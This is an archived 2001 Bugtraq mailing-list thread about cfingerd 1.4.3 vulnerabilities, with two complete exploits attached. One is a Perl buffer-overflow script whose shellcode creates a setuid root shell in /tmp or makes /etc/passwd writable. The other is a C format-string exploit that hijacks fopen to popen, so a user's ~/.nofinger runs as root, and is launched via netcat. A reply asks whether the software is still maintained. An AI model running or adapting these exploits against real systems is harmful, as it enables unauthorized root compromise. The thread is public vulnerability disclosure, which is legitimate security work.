6736391 2001-07-11 20:19 +0200 /21 rader/ teleh0r <teleh0r@digit-labs.org>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-12 02:16 av Brevbäraren
Extern mottagare: BUGTRAQ@securityfocus.com
Mottagare: Bugtraq (import) <17924>
Ärende: Another exploit for cfingerd <= 1.4.3-8
------------------------------------------------------------
Dear bugtraq readers,
This is another exploit for the flaw found by Steven Van Acker.
http://www.securityfocus.com/archive/1/192844
In order to allow for more nops, I have constructed the payload
like this:
<82 nops><jmp 0x4><retaddr><shellcode>
[teleh0r@localhost teleh0r]$ ./cfingerd-exploit.pl -s 1
Address: 0xbffff46c
Exploit attempt succeeded!
[teleh0r@localhost teleh0r]#
Tested against cfingerd 1.4.3-8.
Sincerely yours,
teleh0r
http://www.digit-labs.org/teleh0r/
(6736391) /teleh0r <teleh0r@digit-labs.org>/--------
Bilaga (application/x-perl) i text 6736392
Kommentar i text 6736858 av Phil Stracchino <alaric@babcom.com>
6736392 2001-07-11 20:19 +0200 /158 rader/ teleh0r <teleh0r@digit-labs.org>
Bilagans filnamn: "cfingerd-exploit.pl"
Importerad: 2001-07-12 02:16 av Brevbäraren
Extern mottagare: BUGTRAQ@securityfocus.com
Mottagare: Bugtraq (import) <17925>
Bilaga (text/plain) till text 6736391
Ärende: Bilaga (cfingerd-exploit.pl) till: Another exploit for cfingerd <= 1.4.3-8
------------------------------------------------------------
#!/usr/bin/perl
# | Local buffer overflow exploit for cfingerd
# | Copyright (c) 2001 by <teleh0r@digit-labs.org>
# | All rights reserved.
# |
# | Simple exploit for the vulnerability reported
# | to bugtraq by Steven Van Acker.
# | http://www.securityfocus.com/archive/1/192844
# |
# | If cfingerd does not run as root, the exploit
# | will of course fail!
# |
# | http://www.digit-labs.org/teleh0r/
use Socket; use File::Copy;
use Getopt::Std; getopts('s:p:o:', \%arg);
if (defined($arg{'s'})) { $sjell = $arg{'s'} }
if (defined($arg{'p'})) { $port = $arg{'p'} }
if (defined($arg{'o'})) { $offset = $arg{'o'} }
# shellcodes written by myself especially for
# this exploit.
# 34 bytes
$shellcode1 =
"\x31\xdb". # xor ebx, ebx
"\x31\xc9". # xor ecx, ecx
"\xf7\xe3". # mul ebx
"\x52". # push edx
"\x68\x2f\x2f\x79\x30". # push dword 0x30792f2f
"\x68\x2f\x74\x6d\x70". # push dword 0x706d742f
"\x89\xe3". # mov ebx, esp
"\xb0\xb6". # mov al, 0xb6
"\xcd\x80". # int 0x80
"\x66\xb9\xed\x0d". # mov cx, 0xded
"\xb0\x0f". # mov al, 0xf
"\xcd\x80". # int 0x80
"\x40". # inc eax
"\xcd\x80"; # int 0x80
# 35 bytes
$shellcode2 =
"\xeb\x10". # jmp short file
"\x5b". # pop ebx
"\x31\xc9". # xor ecx, ecx
"\xf7\xe1". # mul ecx
"\x66\xb9\xa6\x01". # mov cx, 0x1a6
"\xb0\x0f". # mov al, mov
"\xcd\x80". # int 0x80
"\x40". # inc eax
"\xcd\x80". # int 0x80
"\xe8\xeb\xff\xff\xff". # call code
"/etc/passwd". # string
"\x00"; # null terminate
# cfingerd does not drop privileges before the
# vulnerable code kicks in, therefore no need
# to use setuid(0);
if (!(defined($sjell))||$sjell !~ m/^(1|2)$/) {&usage}
$shellcode = $sjell == 1 ? $shellcode1 : $shellcode2;
$port ||= 2003;
$user = getlogin() || getpwuid($<);
$return = 0xbffff46c;
$length = 88;
$kewlnop = 'K';
$homedir = (getpwnam($user))[7];
printf("Address: %#lx\n", ($return + $offset));
&do_checkz;
if (connect_host('127.0.0.1', $port)) {
&prepare_attack;
send(SOCKET, "$user\015\012", 0);
close(SOCKET);
sleep(1);
&do_checkz;
die("Sorry, exploit failed - check the values.\n");
}
sub prepare_attack {
for ($i = 0; $i < ($length - 2 - 4); $i++) {
$buffer .= $kewlnop;
}
#<82'nops'><jmp 0x4><retaddr><shellcode>
$buffer .= "\xeb\x04";
$buffer .= pack('l', ($return + $offset));
$buffer .= $shellcode;
if (-e("$homedir/.nofinger")) { # I am nice, huh?
copy("$homedir/.nofinger", "$homedir/.nofinger.BAK");
}
open(FILE, ">$homedir/.nofinger") || die("Error: $!\n");
print(FILE "\$$buffer\n");
close(FILE);
}
sub do_checkz {
if ($sjell == '1') {
if (-u("/tmp/y0") && (stat("/tmp/y0"))[4,5] == '0') {
print("Exploit attempt succeeded!\n");
exec("/tmp/y0");
} elsif (stat("/tmp/y0") == '0') {
copy("/bin/sh", "/tmp/y0") || die("Error: $!\n");
}
} elsif ($sjell == '2') {
if (-w("/etc/passwd")) {
($perm) = (split(/\s/,`ls -la /etc/passwd`))[0];
print("Success: /etc/passwd $perm\n");
exit(0);
}
}
}
sub usage {
system("clear");
# below layout style stolen from qitest1 xinetd exploit ;)
# werd!
print(qq(
cfingerd <= 1.4.3-8 local exploit by teleh0r
All rights reserved.
Usage: $0 [options]
Options:
-s shellcode - see below
-p port - 2003 default
-o offset
Available shellcodes:
1\) root shell in /tmp
2\) writable /etc/passwd
));
exit(1);
}
sub connect_host {
($target, $port) = @_;
$iaddr = inet_aton($target) || die("Error: $!\n");
$paddr = sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto = getprotobyname('tcp') || die("Error: $!\n");
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
return(1);
}
(6736392) /teleh0r <teleh0r@digit-labs.org>/--------
6736858 2001-07-11 17:06 -0700 /28 rader/ Phil Stracchino <alaric@babcom.com>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-12 09:17 av Brevbäraren
Extern mottagare: teleh0r <teleh0r@digit-labs.org>
Extern kopiemottagare: BUGTRAQ@securityfocus.com
Mottagare: Bugtraq (import) <17932>
Kommentar till text 6736391 av teleh0r <teleh0r@digit-labs.org>
Ärende: Re: Another exploit for cfingerd <= 1.4.3-8
------------------------------------------------------------
From: Phil Stracchino <alaric@babcom.com>
To: teleh0r <teleh0r@digit-labs.org>
Cc: BUGTRAQ@securityfocus.com
Message-ID: <20010711170621.A2230@babylon5.babcom.com>
On Wed, Jul 11, 2001 at 08:19:19PM +0200, teleh0r wrote:
> This is another exploit for the flaw found by Steven Van Acker.
> http://www.securityfocus.com/archive/1/192844
<snip>
> Tested against cfingerd 1.4.3-8.
Does anyone know whether cfingerd is actually being maintained any
more, or whether it has been abandoned? The authors appear
unresponsive, and no "official" patch has been released that I am
aware of. The one unofficial patch I've seen is incomplete, and does
not declare the additional variables it uses.
--
Linux Now! ..........Because friends don't let friends use Microsoft.
phil stracchino -- the renaissance man -- mystic zen biker geek
alaric@babcom.com halmayne@sourceforge.net
2000 CBR929RR, 1991 VFR750F3 (foully murdered), 1986 VF500F (sold)
(6736858) /Phil Stracchino <alaric@babcom.com>/(Ombruten)
6736403 2001-07-12 04:51 +1200 /28 rader/ <zen-parse@gmx.net>
Sänt av: joel@lysator.liu.se
Importerad: 2001-07-12 02:22 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17929>
Ärende: Happy 3 month anniversary cfingerd remote bug!
------------------------------------------------------------
Remotish / localish exploit.
I wrote this last night, unaware someone else was going to post
something today.
Here is another exploit for the format string problem in
cfingerd<=1.4.3, using a slightly different method for exploiting
it. Anti script-kiddied by me being lazy.
Exploit redirects fopen() call to popen() and executes code from
~/.nofinger
Read the comments.
-- zen-parse
M4D PR0PZ T0 :
Steven for showing me da bugz
noid 4 b3in6 7h3r3 wh3n no1 3153 w4z
grue 4 lurking, g00bER 4 something
and the rest of #roothat @ irc.pulltheplug.com
4150 70 mp3.com 4 http://mp3.com/cosv
(6736403) / <zen-parse@gmx.net>/----------(Ombruten)
Bilaga (text/plain) i text 6736404
6736404 2001-07-12 04:51 +1200 /88 rader/ <zen-parse@gmx.net>
Bilagans filnamn: "idcf.c"
Importerad: 2001-07-12 02:22 av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <17930>
Bilaga (text/plain) till text 6736403
Ärende: Bilaga (idcf.c) till: Happy 3 month anniversary cfingerd remote bug!
------------------------------------------------------------
/************************************************************
http://www.infodrom.ffis.de/projects/cfingerd/ states:
Cfingerd is a free and secure finger daemon replacement for
standard finger daemons such as GNU fingerd or MIT fingerd.
April 11, 2001 Megyer Laszlo < abulla@freemail.hu > wrote:
In 3 words: REMOTE ROOT VULNERABILITY
idcf.c - July 11 2001 - happy 3 month anniversary!
cfingerd 1.4.3 identd based localish exploit ;]
no shellcode required if you have a local account
make a script in ~/.nofinger that you want to be
executed as root.
it works by diverting the fopen call to popen. of
course it won't help if you don't already have a
local account but well, its just a proof of concept
and I think it's cute, and the more exploits there
are against an unpatched system, the more likely (I
hope) it will get patched. Would be nice if it worked
that way anyway.
./idcf|nc -l -p 113
on a box you have root on, and finger you@otherhost
to use.
this is hardcoded for four letter names, but shouldn't
require rocket science to make work for others.
Hint: offset and padding : format strings are fun.
M4D PR0PZ T0 :
Steven for showing me da bugz
noid 4 b3in6 7h3r3 wh3n no1 3153 w4z
grue 4 lurking, g00bER 4 something
and the rest of #roothat @ irc.pulltheplug.com
4150 70 mp3.com 4 http://mp3.com/cosv
***********************************************************/
// The offsets are from a version i compiled just to
// test the vulnerability and so will most likely not
// work for you.
// get this from objdump -R cfingered|grep fopen
#define OVER 0x0805532c
// get this from objdump -R cfingerd|grep popen
// and then gdb cfingerd and x/x 0xoffset from objdump
#define WITH 0x080491ba
#include <stdio.h>
main(int argc,char*argv[])
{
int z0=0,ovrw=OVER; // address to overwrite with pass 1
int z1=0,ovrw1=OVER+2; // address to overwrite with pass 2
int slen=strlen("evil fingered from ")+9;
int addr=WITH; // what to overwrite the address with
int offset=20; // where the first address is on the stack
int a1,a2;
FILE *f;
f=fopen("/etc/motd","w+");
if(!f)
{
fprintf("You must be root to use this exploit.\n");
exit(1);
}
a1=(addr&0x000ffff)-slen; // 1st number of bytes
a2=(0x10000+(addr>>16)-a1-slen)&0x0ffff; // 2nd number of bytes
printf(":::A%s%s",&ovrw,&ovrw1); // header/padding/addresses
printf("%%%ux%%%d$hn%%%ux%%%d$hn\n" // formatstring itself
,a1,offset,a2,offset+1);
fprintf(stderr,"Visit http://mp3.com/cosv/ today!\n");
fprintf(stderr,"And mebe visit your account on the other machine.\n");
fprintf(stderr,"after you finger it.\n");
fprintf(f,"Visit http://mp3.com/cosv/ today!\n");
fclose(f);
}
(6736404) / <zen-parse@gmx.net>/--------------------